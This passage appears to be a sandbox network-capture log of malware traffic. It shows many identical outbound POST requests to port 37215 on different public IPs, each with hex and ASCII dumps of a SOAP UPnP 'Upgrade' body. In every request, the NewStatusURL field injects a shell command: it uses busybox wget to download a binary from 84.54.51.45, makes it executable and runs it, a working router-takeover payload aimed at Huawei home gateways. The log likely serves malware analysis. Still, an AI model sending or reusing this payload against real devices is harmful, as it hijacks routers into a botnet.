                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2020192.168.2.153431441.67.185.6437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.606086969 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2021192.168.2.155885041.155.80.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.606106043 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2022192.168.2.153386641.109.29.19137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.606157064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2023192.168.2.153686441.9.210.2137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.606185913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2024192.168.2.155109841.253.25.15937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.606277943 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2025192.168.2.155794641.131.200.21937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.606344938 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2026192.168.2.154239841.115.151.21437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.606374979 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2027192.168.2.154111041.72.55.2637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.606375933 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2028192.168.2.153612441.244.240.20137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.606384993 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2029192.168.2.156074641.210.203.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.606405020 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 